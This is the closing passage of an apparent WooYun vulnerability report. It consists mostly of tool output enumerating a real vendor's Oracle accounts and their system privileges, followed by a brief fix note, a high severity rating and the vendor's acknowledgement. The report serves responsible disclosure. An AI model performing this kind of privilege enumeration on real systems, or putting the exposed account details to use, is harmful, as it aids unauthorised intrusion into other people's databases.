    privilege: DROP PUBLIC DATABASE LINK
    privilege: DROP PUBLIC SYNONYM
    privilege: DROP ROLLBACK SEGMENT
    privilege: DROP TABLESPACE
    privilege: DROP USER
    privilege: ENQUEUE ANY QUEUE
    privilege: EXECUTE ANY CLASS
    privilege: EXECUTE ANY EVALUATION CONTEXT
    privilege: EXECUTE ANY INDEXTYPE
    privilege: EXECUTE ANY LIBRARY
    privilege: EXECUTE ANY OPERATOR
    privilege: EXECUTE ANY PROCEDURE
    privilege: EXECUTE ANY PROGRAM
    privilege: EXECUTE ANY RULE
    privilege: EXECUTE ANY RULE SET
    privilege: EXECUTE ANY TYPE
    privilege: EXPORT FULL DATABASE
    privilege: FLASHBACK ANY TABLE
    privilege: FORCE ANY TRANSACTION
    privilege: FORCE TRANSACTION
    privilege: GLOBAL QUERY REWRITE
    privilege: GRANT ANY OBJECT PRIVILEGE
    privilege: GRANT ANY PRIVILEGE
    privilege: GRANT ANY ROLE
    privilege: IMPORT FULL DATABASE
    privilege: INSERT ANY TABLE
    privilege: LOCK ANY TABLE
    privilege: MANAGE ANY FILE GROUP
    privilege: MANAGE ANY QUEUE
    privilege: MANAGE FILE GROUP
    privilege: MANAGE SCHEDULER
    privilege: MANAGE TABLESPACE
    privilege: MERGE ANY VIEW
    privilege: ON COMMIT REFRESH
    privilege: QUERY REWRITE
    privilege: READ ANY FILE GROUP
    privilege: RESTRICTED SESSION
    privilege: RESUMABLE
    privilege: SELECT ANY SEQUENCE
    privilege: SELECT ANY TABLE
    privilege: SELECT ANY TRANSACTION
    privilege: UNDER ANY TABLE
    privilege: UNDER ANY TYPE
    privilege: UNDER ANY VIEW
    privilege: UNLIMITED TABLESPACE
    privilege: UPDATE ANY TABLE
[*] SYSTEM [5]:
    privilege: CREATE MATERIALIZED VIEW
    privilege: CREATE TABLE
    privilege: GLOBAL QUERY REWRITE
    privilege: SELECT ANY TABLE
    privilege: UNLIMITED TABLESPACE
[*] TSMSYS [1]:
    privilege: UNLIMITED TABLESPACE
[*] WDOA [8]:
    privilege: CREATE JOB
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TRIGGER
    privilege: CREATE USER
    privilege: CREATE VIEW
[*] WEIXIN [10]:
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE TRIGGER
    privilege: CREATE VIEW
    privilege: EXECUTE ANY PROCEDURE
    privilege: UNLIMITED TABLESPACE
[*] WMSYS [29]:
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: ALTER ANY INDEX
    privilege: ALTER ANY PROCEDURE
    privilege: ALTER ANY TABLE
    privilege: ALTER ANY TRIGGER
    privilege: ALTER USER
    privilege: CREATE ANY INDEX
    privilege: CREATE ANY PROCEDURE
    privilege: CREATE ANY TABLE
    privilege: CREATE ANY TRIGGER
    privilege: CREATE ANY VIEW
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE ROLE
    privilege: CREATE SEQUENCE
    privilege: DELETE ANY TABLE
    privilege: DROP ANY INDEX
    privilege: DROP ANY PROCEDURE
    privilege: DROP ANY TABLE
    privilege: DROP ANY TRIGGER
    privilege: DROP ANY VIEW
    privilege: DROP PUBLIC SYNONYM
    privilege: EXECUTE ANY PROCEDURE
    privilege: EXECUTE ANY TYPE
    privilege: INSERT ANY TABLE
    privilege: LOCK ANY TABLE
    privilege: SELECT ANY DICTIONARY
    privilege: SELECT ANY TABLE
    privilege: UNLIMITED TABLESPACE
    privilege: UPDATE ANY TABLE
[*] WULIAO [14]:
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: CREATE ANY JOB
    privilege: CREATE DATABASE LINK
    privilege: CREATE JOB
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE ROLE
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE TRIGGER
    privilege: CREATE VIEW
    privilege: EXECUTE ANY PROCEDURE
    privilege: UNLIMITED TABLESPACE
[*] XDB [10]:
    privilege: ALTER SESSION
    privilege: CREATE INDEXTYPE
    privilege: CREATE LIBRARY
    privilege: CREATE OPERATOR
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SESSION
    privilege: CREATE VIEW
    privilege: DROP PUBLIC SYNONYM
    privilege: QUERY REWRITE
    privilege: UNLIMITED TABLESPACE
[*] ZHONGCAI [14]:
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: CREATE ANY JOB
    privilege: CREATE DATABASE LINK
    privilege: CREATE JOB
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE ROLE
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE TRIGGER
    privilege: CREATE VIEW
    privilege: EXECUTE ANY PROCEDURE
    privilege: UNLIMITED TABLESPACE
[*] ZTOWEB [3]:
    privilege: ALTER ANY TABLE
    privilege: ALTER TABLESPACE
    privilege: UNLIMITED TABLESPACE


漏洞证明:

修复方案:

修改密码,过滤SQL特殊字符

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-02 09:30

厂商回复:

感谢白帽子的辛苦劳动,开发已经在开始修复。

最新状态:

暂无